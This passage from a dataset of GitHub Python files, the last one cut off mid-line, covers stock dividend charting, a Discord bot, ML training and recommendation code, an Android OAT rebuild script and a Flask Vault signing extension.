+{"seq_id":"422298693","text":"import yfinance as yf\nimport pandas as pd\nimport datetime\nimport altair as alt\n\n\ndef get_data(ticker, start_date, end_date):\n ticker_data = yf.Ticker(ticker)\n df = ticker_data.history(start=start_date, end=end_date).reset_index()[\n [\"Date\", \"Close\", \"Dividends\"]]\n df[\"Close\"] = yf.download(ticker, start_date, end_date)[\"Close\"].values\n return df\n\n\ndef modify_data(initial_investment, df):\n df.loc[0, \"Shares - Not Reinvested\"] = initial_investment / df.loc[0, \"Close\"]\n df.loc[0, \"Shares - Reinvested\"] = initial_investment / df.loc[0, \"Close\"]\n\n for i in range(len(df) - 1):\n df.loc[i+1, \"Shares - Reinvested\"] = df.loc[i, \"Shares - Reinvested\"] + \\\n (df.loc[i+1, \"Dividends\"] *\n df.loc[i, \"Shares - Reinvested\"]) / df.loc[i+1, \"Close\"]\n df.loc[i+1, \"Shares - Not Reinvested\"] = df.loc[i,\n \"Shares - Not Reinvested\"]\n\n df[\"Value - Reinvested\"] = df[\"Shares - Reinvested\"] * df[\"Close\"]\n df[\"Cash Dividends\"] = (df[\"Shares - Not Reinvested\"]\n * df[\"Dividends\"]).cumsum()\n df[\"Value - Not Reinvested\"] = df[\"Shares - Not Reinvested\"] * \\\n df[\"Close\"] + df[\"Cash Dividends\"]\n\n return df\n\n\ndef get_benchmark(benchmark_ticker, start_date, end_date, initial_investment):\n df = yf.download(benchmark_ticker, start_date, end_date)[\n \"Close\"].reset_index()\n\n df[\"Shares\"] = initial_investment / df.loc[0, \"Close\"]\n df[\"Value\"] = df[\"Shares\"] * df[\"Close\"]\n\n return df\n\n\ndef get_plotting_df(benchmark_df, stock_df, benchmark_ticker):\n reinvested_df = stock_df[[\n \"Date\", \"Value - Reinvested\"]].rename(columns={\"Value - Reinvested\": \"Value\"})\n reinvested_df[\"Case\"] = \"Dividends Reinvested\"\n\n not_reinvested_df = stock_df[[\n \"Date\", \"Value - Not Reinvested\"]].rename(columns={\"Value - Not Reinvested\": \"Value\"})\n not_reinvested_df[\"Case\"] = \"Dividends Not Reinvested\"\n\n benchmark_df[\"Case\"] = benchmark_ticker\n\n plotting_df = pd.concat(\n (reinvested_df, not_reinvested_df, benchmark_df[[\"Date\", \"Value\", \"Case\"]]))\n\n return plotting_df\n\n\ndef get_chart(data):\n hover = alt.selection_single(\n fields=[\"Date\"],\n nearest=True,\n on=\"mouseover\",\n empty=\"none\",\n )\n\n lines = (\n alt.Chart(data, title=\"DRIP Return\")\n .mark_line()\n .encode(\n alt.X(\"Date\", scale=alt.Scale(\n zero=False, nice=False), title=\"Date\"),\n alt.Y(\"Value:Q\", scale=alt.Scale(zero=False)),\n color='Case',\n strokeDash='Case'\n )\n )\n\n points = lines.transform_filter(hover).mark_circle(size=65)\n\n tooltips = (\n alt.Chart(data)\n .mark_rule()\n .encode(\n x=\"Date\",\n y=\"Value:Q\",\n opacity=alt.condition(hover, alt.value(0.3), alt.value(0)),\n tooltip=[\n alt.Tooltip(\"Date\", title=\"Date\"),\n alt.Tooltip(\"Value\", title=\"Value\"),\n alt.Tooltip('Case', title=\"Case\")\n ],\n )\n .add_selection(hover)\n )\n return (lines + points + tooltips).interactive()\n\n\nif __name__ == \"__main__\":\n\n ticker = \"XYLD\"\n benchmark_ticker = \"SPY\"\n\n start_date = datetime.datetime.today() - datetime.timedelta(days=2000)\n end_date = datetime.datetime.today()\n\n df = get_data(ticker, start_date, end_date)\n df = modify_data(10000, df)\n benchmark_df = get_benchmark(benchmark_ticker, start_date, end_date, 10000)\n\n plotting_df = get_plotting_df(benchmark_df, df, benchmark_ticker)\n plotting_df[\"Value\"] = plotting_df[\"Value\"].round(decimals=2)\n\n chart = get_chart(plotting_df)\n\n print(chart)\n","repo_name":"victormorizon/financial-superapp","sub_path":"functions/drip_functions.py","file_name":"drip_functions.py","file_ext":"py","file_size_in_byte":3741,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"36"}
+{"seq_id":"15429270600","text":"# montecarlo-tf.py\n\nimport tensorflow as tf\nimport matplotlib.pyplot as plt\n\n@profile\ndef mondecarlo_pi_tf(iteration):\n trials = iteration\n hits = 0\n\n x = tf.random_uniform([1],minval=-1,maxval=1,dtype=tf.float32)\n y = tf.random_uniform([1],minval=-1,maxval=1,dtype=tf.float32)\n\n sess = tf.Session()\n\n with sess.as_default():\n for i in range(1,trials):\n if x.eval()**2 + y.eval()**2 < 1 :\n hits = hits + 1\n\nmondecarlo_pi_tf(10000)\n","repo_name":"mesmerli/tf-example","sub_path":"performance/montecarlo-pi/kernprof/montecarlo-tf.py","file_name":"montecarlo-tf.py","file_ext":"py","file_size_in_byte":482,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"36"}
+{"seq_id":"4252035394","text":"import discord\r\nfrom discord.ext import commands\r\n\r\nclass RoleSetup(commands.Cog):\r\n\r\n def __init__(self, client):\r\n self.client = client\r\n\r\n @commands.Cog.listener()\r\n async def on_ready(self):\r\n print(\"RoleSetup.py is ready!\")\r\n\r\n @commands.command()\r\n async def setup(self, ctx):\r\n try:\r\n embed_var = discord.Embed(title=\"CHOOSE YOUR ROLES!\", description=\r\n \"\\nReact to this message to assign yourself a role!\\n\"\r\n \"\\n⛏️ mind crafters\\n\"\r\n \"🔫 Valorant Gang\\n\"\r\n \"🐉 DnDers\\n\"\r\n \"🎮 EPIC Fortnite Gamers\\n\"\r\n \"🃏 Pokemon TCG Masters\\n\"\r\n \"🧘♂️ master meditators\\n\"\r\n \"💪 SHREDDED\\n\", color=discord.Color.red())\r\n\r\n await ctx.send(embed=embed_var)\r\n except Exception as e:\r\n print(\"Error:\", e)\r\n\r\nasync def setup(client):\r\n await client.add_cog(RoleSetup(client))\r\n","repo_name":"brielle5810/sk8_bot","sub_path":"RoleSetup.py","file_name":"RoleSetup.py","file_ext":"py","file_size_in_byte":1146,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"36"}
+{"seq_id":"20061477493","text":"def ordered_ints(list_of_objects: list):\n new_list = []\n for i in list_of_objects:\n if i == ():\n new_list.append(int(len(i)))\n else:\n new_list.append(int(i))\n new_list.sort(reverse=True)\n return new_list\n\n\nprint(ordered_ints([1, True, '123', False, 6, ()]))\ndef sum_of_square(n: int):\n if n == 0:\n return 0\n else:\n return n ** 2 + sum_of_square(n - 1)\n\n\nprint(sum_of_square(10))\ndef factorial_of_squares(n: int):\n if n == 1:\n return 1\n else:\n return n ** 2 * factorial_of_squares(n - 1)\n\n\nprint(factorial_of_squares(3))\ndef process_text(text: str):\n first_text = \"\"\n # second_text = \"\"\n for i in text:\n if i == \" \":\n split_text = text.split(\" \", 1)[0]\n first_text = split_text.upper()\n second_text = text.split(\" \", 1)[1]\n\n for i in second_text:\n if (i != i.lower()) or (i == \" \") or (i == i.isnumeric()):\n second_text = second_text.replace(i, '_')\n\n return (first_text, second_text)\n\n\nprint(process_text('1234567a Text to te5t'))","repo_name":"silvisig/pep20g06","sub_path":"modul3/homework3.py","file_name":"homework3.py","file_ext":"py","file_size_in_byte":1115,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"36"}
+{"seq_id":"21993855134","text":"import logging\n\nimport torch\nfrom torch import nn\nfrom torch.nn import Module\nfrom torchvision import models\n\n\nclass FeaturePredictorModelWrapper:\n\n def __init__(self, model_state_file: str, feature_extraction: bool):\n self.model_state_file = model_state_file\n\n self.model: Module = models.resnet50(pretrained=True)\n classifier_block_features: int = self.model.fc.in_features\n linear_out_features: int = 128\n self.feature_extraction = feature_extraction\n\n if self.feature_extraction:\n self.freeze_layers()\n else:\n logging.info(\"Fine-tuning: Skipping layer freezing\")\n\n self.model.fc = nn.Sequential(\n nn.Linear(in_features=classifier_block_features, out_features=linear_out_features),\n nn.ReLU(),\n nn.Linear(in_features=linear_out_features, out_features=2)\n )\n\n def freeze_layers(self):\n logging.info(\"Freezing base model parameters for feature extraction\")\n for name, parameter in self.model.named_parameters():\n parameter.requires_grad = False\n\n def load_model_from_file(self, device: str) -> None:\n self.model.load_state_dict(torch.load(self.model_state_file))\n self.model = self.model.to(device)\n\n logging.info(\"Model state loaded from {} to device {}\".format(self.model_state_file, device))\n\n def save_model_state(self):\n torch.save(self.model.state_dict(), self.model_state_file)\n logging.info(\"Model state saved at {}\".format(self.model_state_file))\n","repo_name":"cptanalatriste/birds-of-british-empire","sub_path":"featurepred/model.py","file_name":"model.py","file_ext":"py","file_size_in_byte":1547,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"36"}
+{"seq_id":"24206245635","text":"import os\nimport sys\nimport subprocess\n\nTMP_FOLDER = \"/tmp/zip_dex_stuff\"\nONHOST_SYSTEM_ROOT=\"/system\"\nORG_BASE_FOLDER = \"/system\"\nDEOAT_BASE_FOLDER = \"./deoat\"\nOUT_BASE_FOLDER = \"./genoat\"\nBAKSMALI_BASE = \"java -jar ./baksmali-2.3.4.jar\"\nDEX2OAT_BASE = \"./bin/dex2oat\" # CHECK\nARCH = [\n\t# (\"arm\", \"krait\"), # Nexus 6\n\t(\"x86_64\", \"x86_64\"), # Emulator\n\t(\"x86\", \"x86\"), # Emulator\n]\nARCH_BOOT_OAT_PATH = {}\n# ARCH_BOOT_CLASS_PATH = {}\n\ndef mkdir(d):\n os.system(\"mkdir -p \" + d)\n\ndef rmall(d):\n os.system(\"rm -rf \" + d)\n\ndef listfiles(d):\n return [f for f in os.listdir(d) if os.path.isfile(os.path.join(d, f))]\n\ndef consolidate(dex_list):\n last_dex_name = None\n curr_dex_files = {}\n all_dex_maps = {}\n # Reverse sorting makes sure that \"xxx.dex\" comes before \"xxx-classesN.dex\"\n # \"__dummy.dex\" helps populate the last mapping\n for dex in sorted(dex_list, reverse=True) + [\"__dummy.dex\"]:\n if dex[-4:] != \".dex\":\n continue\n # print(dex)\n if last_dex_name:\n if dex.startswith(last_dex_name + \"-classes\"):\n curr_dex_files[dex] = dex[dex.rfind(\"-\")+1:]\n elif last_dex_name != dex:\n all_dex_maps[last_dex_name] = curr_dex_files\n # print(last_dex_name, curr_dex_files)\n curr_dex_files = {dex: \"classes.dex\"}\n last_dex_name = dex[:-4]\n else:\n curr_dex_files = {dex: \"classes.dex\"}\n last_dex_name = dex[:-4]\n return all_dex_maps\n\ndef zip_dex(dex_maps, src_dir, dest_dir, suffix):\n for dex_name, dex_mapping in dex_maps.items():\n rmall(TMP_FOLDER)\n mkdir(TMP_FOLDER)\n str_dex_list = \"\"\n for org_dex_name, new_dex_name in dex_mapping.items():\n subprocess.call(\"cp %s/%s %s/%s\" % (src_dir, org_dex_name, TMP_FOLDER, new_dex_name), shell=True)\n str_dex_list += \" \" + new_dex_name\n tmp_path = TMP_FOLDER + \"/\" + dex_name + suffix\n dest_path = dest_dir + \"/\" + dex_name + suffix\n subprocess.call(\"cd \" + TMP_FOLDER + \" && zip -q \" + dex_name + suffix + str_dex_list, shell=True)\n subprocess.call(\"zipalign 4 \" + tmp_path + \" \" + dest_path, shell=True)\n rmall(TMP_FOLDER)\n\nmkdir(OUT_BASE_FOLDER)\n\n\nCOMPONENT, EXT = \"boot\", \".jar\"\nORG_COMPO_FOLDER = ORG_BASE_FOLDER + \"/\" + COMPONENT\nDEOAT_COMPO_FOLDER = DEOAT_BASE_FOLDER + \"/\" + COMPONENT\nOUT_COMPO_FOLDER = OUT_BASE_FOLDER + \"/\" + COMPONENT\nREMOTE_BASE_FOLDER = \"/system/framework/\"\nONHOST_BASE_FOLDER = ONHOST_SYSTEM_ROOT + \"/framework\"\n\nrmall(OUT_COMPO_FOLDER)\nmkdir(OUT_COMPO_FOLDER)\n\ndex_list = listfiles(DEOAT_COMPO_FOLDER)\ncons_dex_list = consolidate(dex_list)\nzip_dex(cons_dex_list, DEOAT_COMPO_FOLDER, OUT_COMPO_FOLDER, EXT)\n\nfor (arch, arch_variant) in ARCH:\n ORG_ARCH_F = ORG_COMPO_FOLDER + \"/\" + arch + \"/boot.oat\"\n if not os.path.exists(ORG_ARCH_F):\n continue\n OUT_ARCH_FOLDER = OUT_COMPO_FOLDER + \"/\" + arch\n ONHOST_ARCH_FOLDER = ONHOST_BASE_FOLDER + \"/\" + arch\n mkdir(OUT_ARCH_FOLDER)\n OUT_ARCH_F = OUT_ARCH_FOLDER + \"/boot.oat\"\n ONHOST_ARCH_F = ONHOST_ARCH_FOLDER + \"/boot.oat\"\n ARCH_BOOT_OAT_PATH[arch] = ONHOST_BASE_FOLDER + \"/boot.oat\"\n # ARCH_BOOT_CLASS_PATH[arch] = boot_class_path = []\n\n dex_list = subprocess.check_output(\"%s list dex %s\" % (BAKSMALI_BASE, ORG_ARCH_F), shell=True)\n dex_list = [f.strip() for f in dex_list.strip().split(\"\\n\")]\n clean_dex_list = []\n\n for dex_path in dex_list:\n if not dex_path.startswith(REMOTE_BASE_FOLDER):\n continue\n dex_fn = dex_path[dex_path.rfind(\"/\")+1:]\n if \":\" in dex_fn:\n continue\n if not dex_fn.endswith(EXT):\n continue\n clean_dex_list.append(dex_fn)\n\n dex2oat_cmd = \"cd \" + OUT_COMPO_FOLDER + \" && \"\n dex2oat_cmd += ( DEX2OAT_BASE + \" \"\n \"--runtime-arg -Xms64m \"\n \"--runtime-arg -Xmx64m \"\n \"--image-classes=\" + ONHOST_SYSTEM_ROOT + \"/etc/preloaded-classes \" )\n \n for dex in clean_dex_list:\n # zip_loc = OUT_COMPO_FOLDER + \"/\" + dex\n dex2oat_cmd += \"--dex-file=\" + dex + \" \"\n # boot_class_path.append(zip_loc)\n for dex in clean_dex_list:\n dex2oat_cmd += \"--dex-location=\" + REMOTE_BASE_FOLDER + dex + \" \"\n \n dex2oat_cmd += ( \"--oat-symbols=\" + OUT_ARCH_F[len(OUT_COMPO_FOLDER)+1:-4] + \".sym \"\n \"--oat-file=\" + ONHOST_ARCH_F + \" \"\n \"--oat-location=\" + REMOTE_BASE_FOLDER + arch + \"/boot.oat \"\n \"--image=\" + ONHOST_ARCH_F[:-4] + \".art \"\n \"--base=0x70000000 \"\n \"--instruction-set=\" + arch + \" \"\n \"--instruction-set-variant=\" + arch_variant + \" \"\n \"--instruction-set-features=default \"\n \"--android-root=\" + ONHOST_SYSTEM_ROOT + \" \"\n \"--include-patch-information \"\n \"--runtime-arg -Xnorelocate \"\n \"--no-generate-debug-info\" )\n print(dex2oat_cmd)\n os.system(\"rm \" + ONHOST_ARCH_F + \" \" + ONHOST_ARCH_F[:-4] + \".art\")\n subprocess.call(dex2oat_cmd, shell=True)\n os.system(\"cp \" + ONHOST_ARCH_F + \" \" + OUT_ARCH_F)\n os.system(\"cp \" + ONHOST_ARCH_F[:-4] + \".art\" + \" \" + OUT_ARCH_F[:-4] + \".art\")\n # sys.exit(0)\n\nraw_input(\"Press Enter to continue...\")\n\nfor COMPONENT, EXT, REPEAT_NAME in [\n (\"framework\", \".jar\", False),\n (\"app\", \".apk\", True),\n (\"priv-app\", \".apk\", True)\n ]:\n ORG_COMPO_FOLDER = ORG_BASE_FOLDER + \"/\" + COMPONENT\n DEOAT_COMPO_FOLDER = DEOAT_BASE_FOLDER + \"/\" + COMPONENT\n OUT_COMPO_FOLDER = OUT_BASE_FOLDER + \"/\" + COMPONENT\n REMOTE_BASE_FOLDER = \"/system/\" + COMPONENT + \"/\"\n\n rmall(OUT_COMPO_FOLDER)\n mkdir(OUT_COMPO_FOLDER)\n\n dex_list = listfiles(DEOAT_COMPO_FOLDER)\n cons_dex_list = consolidate(dex_list)\n zip_dex(cons_dex_list, DEOAT_COMPO_FOLDER, OUT_COMPO_FOLDER, EXT)\n\n for (arch, arch_variant) in ARCH:\n ORG_ARCH_FOLDER = ORG_COMPO_FOLDER + \"/\" + arch\n BOOT_ART_PATH = ARCH_BOOT_OAT_PATH[arch][:-4] + \".art\"\n # str_boot_class_path = \":\".join(ARCH_BOOT_CLASS_PATH[arch])\n OUT_ARCH_FOLDER = OUT_COMPO_FOLDER + \"/\" + arch\n mkdir(OUT_ARCH_FOLDER)\n\n for odex in listfiles(ORG_ARCH_FOLDER):\n if odex[-5:] != \".odex\":\n continue\n org_odex_path = ORG_ARCH_FOLDER + \"/\" + odex\n # out_odex_path = OUT_ARCH_FOLDER + \"/\" + odex\n out_odex_path = arch + \"/\" + odex\n dex_list = subprocess.check_output(\"%s list dex %s\" % (BAKSMALI_BASE, org_odex_path), shell=True)\n dex_list = [f.strip() for f in dex_list.strip().split(\"\\n\")]\n clean_dex_list = []\n\n for dex_path in dex_list:\n if not dex_path.startswith(REMOTE_BASE_FOLDER):\n continue\n dex_fn = dex_path[dex_path.rfind(\"/\")+1:]\n if \":\" in dex_fn:\n continue\n if not dex_fn.endswith(EXT):\n continue\n clean_dex_list.append(dex_fn)\n \n dex2oat_cmd = \"cd \" + OUT_COMPO_FOLDER + \" && \"\n dex2oat_cmd += ( DEX2OAT_BASE + \" \"\n \"--runtime-arg -Xms64m \"\n \"--runtime-arg -Xmx512m \"\n \"--boot-image=\" + BOOT_ART_PATH + \" \" )\n \n for dex in clean_dex_list:\n dex2oat_cmd += \"--dex-file=\" + dex + \" \"\n for dex in clean_dex_list:\n dex2oat_cmd += \"--dex-location=\" + REMOTE_BASE_FOLDER\n if REPEAT_NAME:\n dex2oat_cmd += dex[:-len(EXT)] + \"/\"\n dex2oat_cmd += dex + \" \"\n\n dex2oat_cmd += ( \"--oat-file=\" + out_odex_path + \" \"\n \"--android-root=\" + ONHOST_SYSTEM_ROOT + \" \"\n \"--instruction-set=\" + arch + \" \"\n \"--instruction-set-variant=\" + arch_variant + \" \"\n \"--instruction-set-features=default \"\n \"--include-patch-information \"\n \"--runtime-arg -Xnorelocate \"\n \"--no-generate-debug-info \"\n \"--abort-on-hard-verifier-error\" )\n print(dex2oat_cmd)\n subprocess.call(dex2oat_cmd, shell=True)\n # break\n # break\n","repo_name":"TOLLER-Android/main","sub_path":"agent-build/gen-oat.py","file_name":"gen-oat.py","file_ext":"py","file_size_in_byte":8485,"program_lang":"python","lang":"en","doc_type":"code","stars":20,"dataset":"github-code","pt":"36"}
+{"seq_id":"42997192151","text":"import os\n\nfrom base64 import (\n b64decode,\n b64encode,\n)\n\nimport hvac\n\nfrom flask import g\n\nfrom cabotage.utils.cert_hacks import construct_cert_from_public_key\n\n\nclass Vault(object):\n def __init__(self, app=None):\n self.app = app\n if app is not None:\n self.init_app(app)\n\n def init_app(self, app):\n self.vault_url = app.config.get(\"VAULT_URL\", \"http://127.0.0.1:8200\")\n self.vault_verify = app.config.get(\"VAULT_VERIFY\", False)\n self.vault_cert = app.config.get(\"VAULT_CERT\", None)\n self.vault_token = app.config.get(\"VAULT_TOKEN\", None)\n self.vault_token_file = app.config.get(\n \"VAULT_TOKEN_FILE\", os.path.expanduser(\"~/.vault-token\")\n )\n self.vault_token_unwrap = app.config.get(\"VAULT_TOKEN_UNWRAP\", False)\n self.vault_prefix = app.config.get(\"VAULT_PREFIX\", \"secret/cabotage\")\n self.vault_signing_mount = app.config.get(\"VAULT_SIGNING_MOUNT\", \"transit\")\n self.vault_signing_key = app.config.get(\"VAULT_SIGNING_KEY\", \"cabotage-app\")\n\n if self.vault_token is None:\n if os.path.exists(self.vault_token_file):\n with open(self.vault_token_file, \"r\") as vault_token_file:\n self.vault_token = vault_token_file.read().lstrip().rstrip()\n\n # Unwrap!\n # if self.vault_token_unwrap:\n # unwrap_dang_token\n\n app.teardown_appcontext(self.teardown)\n\n def connect_vault(self):\n vault_client = hvac.Client(\n url=self.vault_url,\n token=self.vault_token,\n verify=self.vault_verify,\n cert=self.vault_cert,\n )\n return vault_client\n\n def teardown(self, exception):\n g.pop(\"vault_client\", None)\n\n @property\n def vault_connection(self):\n if \"vault_client\" not in g:\n g.vault_client = self.connect_vault()\n return g.vault_client\n\n @property\n def signing_public_key(self):\n VAULT_TRANSIT_KEY = f\"{self.vault_signing_mount}/keys/{self.vault_signing_key}\"\n key_data = self.vault_connection.read(VAULT_TRANSIT_KEY)\n keys = key_data[\"data\"][\"keys\"]\n latest = str(key_data[\"data\"][\"latest_version\"])\n return keys[latest][\"public_key\"].encode()\n\n @property\n def signing_cert(self):\n return construct_cert_from_public_key(\n self.sign_payload,\n self.signing_public_key,\n \"cabotage-app\",\n )\n\n def sign_payload(self, payload, algorithm=\"sha2-256\", marshaling_algorithm=\"asn1\"):\n if algorithm not in (\"sha2-224\", \"sha2-256\", \"sha2-384\", \"sha2-512\"):\n raise KeyError(f\"Specified algorithm ({algorithm}) not supported!\")\n VAULT_TRANSIT_SIGNING = (\n f\"{self.vault_signing_mount}/sign/{self.vault_signing_key}/{algorithm}\"\n )\n signature_response = self.vault_connection.write(\n VAULT_TRANSIT_SIGNING,\n input=b64encode(payload.encode()).decode(),\n marshaling_algorithm=marshaling_algorithm,\n )\n if marshaling_algorithm == \"jws\":\n return signature_response[\"data\"][\"signature\"].split(\":\")[2]\n signature_encoded = signature_response[\"data\"][\"signature\"].split(\":\")[2]\n return b64decode(signature_encoded)\n","repo_name":"cabotage/cabotage-app","sub_path":"cabotage/server/ext/vault.py","file_name":"vault.py","file_ext":"py","file_size_in_byte":3296,"program_lang":"python","lang":"en","doc_type":"code","stars":21,"dataset":"github-code","pt":"36"}
+{"seq_id":"43606644090","text":"stack=[]\r\ndef stackpush():\r\n item=input(\"Enter your stack item to add : \")\r\n stack.append(item)\r\n print(item,\" has been added to stack\")\r\n\r\ndef stackpop():\r\n item=stack.pop()\r\n print(item,\" has been removed from stack\")\r\n\r\ndef stackview():\r\n print(\"Stack : \", stack)\r\n\r\nchoice_dict={'u':'stackpush','o':'stackpop','v':'stackview'}\r\ndef welcome():\r\n print('''Welcome to stack. Please choose an option(u/o/v/e)\r\n P(u)sh\r\n P(o)p\r\n (V)iew\r\n (E)xit''')\r\n choice=input(\"Enter your option(u/o/v/e) : \")\r\n while True :\r\n if choice not in 'uove' :\r\n print(\"Invalid choice\")\r\n else:\r\n if choice == 'u':\r\n stackpush()\r\n welcome()\r\n elif choice == 'o' :\r\n stackpop()\r\n welcome()\r\n elif choice == 'v' :\r\n stackview()\r\n welcome()\r\n else :\r\n print('Exiting ......')\r\n exit()\r\n\r\n\r\n\r\nwelcome()","repo_name":"Kulamanipradhan0/Python","sub_path":"DataType/List/Stack.py","file_name":"Stack.py","file_ext":"py","file_size_in_byte":1052,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"36"}
+{"seq_id":"27049414239","text":"import os\nimport json\nimport time\n\nfrom flask import Flask\nfrom pathlib import Path\nimport joblib\n\nfrom google.cloud import storage\n\nGOOGLE_CLOUD_PROJECT = os.environ.get(\"GOOGLE_CLOUD_PROJECT\", \"local\")\nBUCKET_NAME = os.environ.get(\"GOOGLE_CLOUD_PROJECT\", \"kz-rec-sys-dev\")\nTMP_MODEL_DIR = Path(os.environ.get(\"TMP_MODEL_DIR\", \"/tmp\"))\n\nif GOOGLE_CLOUD_PROJECT == \"local\":\n service_account_json = str(Path.home() / '.gcp/kz-rec-sys-dev.json')\n storage_client = storage.Client.from_service_account_json(service_account_json)\nelse:\n storage_client = storage.Client()\n\nbucket = storage_client.get_bucket(BUCKET_NAME)\n\napp = Flask(__name__)\n\nmodels = {}\n\norganization_ids = [16655]\nfilenames = [\"model\", \"uuid_cat_id_map\", \"show_cat_id_map\", \"user_items\"]\n\nfor organization_id in organization_ids:\n models[organization_id] = {}\n organization_tmp_dir = TMP_MODEL_DIR / str(organization_id)\n if not organization_tmp_dir.is_dir():\n organization_tmp_dir.mkdir(parents=True)\n\n # ダウンロード\n for filename in filenames:\n gcs_path = f\"{organization_id}/{filename}.pickle\"\n local_path = organization_tmp_dir / f\"{filename}.pickle\"\n if not local_path.exists():\n bucket.blob(gcs_path).download_to_filename(local_path)\n\n # joblib load\n for filename in filenames:\n local_path = organization_tmp_dir / f\"{filename}.pickle\"\n print(local_path)\n for _ in range(100):\n try:\n models[organization_id][filename] = joblib.load(open(local_path), \"rb\")\n except:\n print(\"error\")\n time.sleep(1)\n else:\n print(\"done\")\n break\n\n@app.route('/')\ndef hello_world():\n target = os.environ.get('TARGET', 'World')\n return 'Hello {}!\\n'.format(target)\n\n@app.route('/rec/')\ndef rec():\n organization_id = 16655\n uuid = '0000019a-f4cd-9a19-6445-58fc330c76db'\n model = models[organization_id]['model']\n user_items = models[organization_id]['user_items']\n uuid_cat_id_map = models[organization_id]['uuid_cat_id_map']\n show_cat_id_map = models[organization_id]['show_cat_id_map']\n recommendations = model.recommend(uuid_cat_id_map[uuid], user_items, N=30, filter_already_liked_items=True)\n rec_fmts = []\n\n for show_cat_code, score in recommendations:\n show_id = show_cat_id_map[show_cat_code]\n\n rec_fmts.append(\n {\"item_id\": show_id, \"score\": float(score)}\n )\n\n return json.dumps(rec_fmts)\n\nif __name__ == \"__main__\":\n app.run(host='0.0.0.0', port=8080, debug=True)","repo_name":"ikedaosushi/sandbox","sub_path":"gcp/gae/gae_rec/app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":2596,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"36"}
+{"seq_id":"4139797825","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Thu Jun 13 16:37:46 2019\n\n@author: anup\n\"\"\"\n# =============================================================================\n# Importing Libraries\n# =============================================================================\nimport os\nimport numpy as np\nimport datetime\nimport matplotlib.pyplot as plt\nimport torch\nimport torch.nn as nn\nimport torch.nn.functional as F\nfrom torch.autograd import Variable\nimport torch.utils.data as data\nimport torchvision\nfrom torchvision import transforms\nimport network_01 as nw\nfrom utils_01 import *\n\ndevice = torch.device(\"cuda:0\" if torch.cuda.is_available() else \"cpu\")\nprint(\"Device :\", device)\n# =============================================================================\n# Defining Parameters\n# =============================================================================\nVERSION = 8\nEPOCHS = 100\nBATCH_SIZE = 8\nLEARNING_RATE = 0.001\nTRAIN_DATA_PATH = \"/home/anup/work/multilabel/label_tool/dataset_single/new_data/\"\nTEST_DATA_PATH = \"/home/anup/work/multilabel/label_tool/dataset_single/new_data/\"\n\ntransformed_dataset = MultiLabelDataset(img_file = '/home/anup/work/multilabel/label_tool/train_dataset.pkl',\n root_dir = TRAIN_DATA_PATH,\n transform = transforms.Compose([ReSize((256, 256)),\n ImCrop(224),\n TensorConv()]))\n\ntrain_data_loader = data.DataLoader(transformed_dataset, \n batch_size=BATCH_SIZE, \n shuffle=True, \n num_workers=1)\n\ntransformed_test_dataset = MultiLabelDataset(img_file = '/home/anup/work/multilabel/label_tool/test_dataset.pkl',\n root_dir = TEST_DATA_PATH,\n transform = transforms.Compose([ReSize((256, 256)),\n ImCrop(224),\n TensorConv()]))\ntest_data_loader = data.DataLoader(transformed_test_dataset,\n batch_size=BATCH_SIZE, \n shuffle=True, \n num_workers=1)\n\n\nprint(\"=\"*50)\n\nif __name__ == '__main__':\n\n print(\"Number of train samples: \", len(transformed_dataset))\n print(\"Number of test samples: \", len(transformed_test_dataset))\n print(\"Detected Classes are: \", transformed_dataset.class_to_idx) # classes are detected by folder structure\n class_dict = transformed_dataset.class_to_idx\n class_dict_reverse = {v: k for k, v in class_dict.items()}\n class_dict.update(class_dict_reverse)\n save_dict(class_dict, 'class_label_dict')\n\n model = nw.multi_label_vgg_model(training=True).to(device)\n optimizer = torch.optim.Adam([{'params': model.features.parameters()}, {'params': model.classifier.parameters(), 'lr': 1e-6}], lr=1e-7)\n scheduler = torch.optim.lr_scheduler.ReduceLROnPlateau(optimizer=optimizer, mode='min', patience=5, verbose=True)\n loss_func = nn.BCEWithLogitsLoss()\n\n # Training and Testing\n train_loss_list = []\n test_loss_list = []\n start_time = datetime.datetime.now()\n for epoch in range(EPOCHS):\n model = model.train()\n print(\"Epoch No: \", epoch + 1)\n running_loss = 0.0\n for step_train, train_sample_batched in enumerate(train_data_loader):\n images_batch, labels_batch = train_sample_batched['image'], train_sample_batched['comp_vector']\n images_batch = images_batch.to(device)\n labels_batch = labels_batch.to(device)\n optimizer.zero_grad()\n output = model(images_batch)\n loss = loss_func(output, labels_batch) \n loss.backward() \n optimizer.step()\n running_loss += loss.item()\n if step_train > 0:\n train_loss_list.append(running_loss / step_train)\n print('[%d] Epoch loss: %.6f' %\n (epoch + 1, running_loss / step_train))\n \n test_running_loss = 0.0\n accuracy_prd_list = []\n accuracy_inp_list = []\n for step_test, test_sample_batched in enumerate(test_data_loader):\n model=model.eval()\n test_inputs, test_labels = test_sample_batched['image'], test_sample_batched['comp_vector']\n test_inputs = test_inputs.cuda()\n test_labels = test_labels.cuda()\n test_output = model(test_inputs)\n test_loss = loss_func(test_output, test_labels)\n test_running_loss += test_loss.item()\n test_output[test_output > 0] = 1\n test_output[test_output < 0] = 0\n accuracy_prd_list.extend(test_output.cpu().tolist())\n accuracy_inp_list.extend(test_labels.cpu().tolist())\n test_loss = 0.0\n test_loss_list.append(test_running_loss/step_test)\n scheduler.step(test_running_loss)\n print('[%d] Valid loss: %.6f' %\n (epoch + 1, test_running_loss/step_test))\n accuracy_prd_list = [item for sublist in accuracy_prd_list for item in sublist]\n accuracy_inp_list = [item for sublist in accuracy_inp_list for item in sublist]\n test_accuracy = []\n for i in range(len(accuracy_prd_list)):\n if accuracy_prd_list[i] == accuracy_inp_list[i]:\n test_accuracy.append(1)\n else:\n test_accuracy.append(0)\n print('[%d] Valid accuracy: %.2f' %\n (epoch + 1, round(100 * sum(test_accuracy)/len(accuracy_inp_list), 2)))\n print(\"=\"*50)\n print(\" \"*50)\nfinish_time = datetime.datetime.now()\ntime_diff = finish_time - start_time\nprint (\"Training time: \", divmod(time_diff.total_seconds(), 60))\ntorch.save(model.state_dict(), 'model/model_single_v' + str(VERSION) + 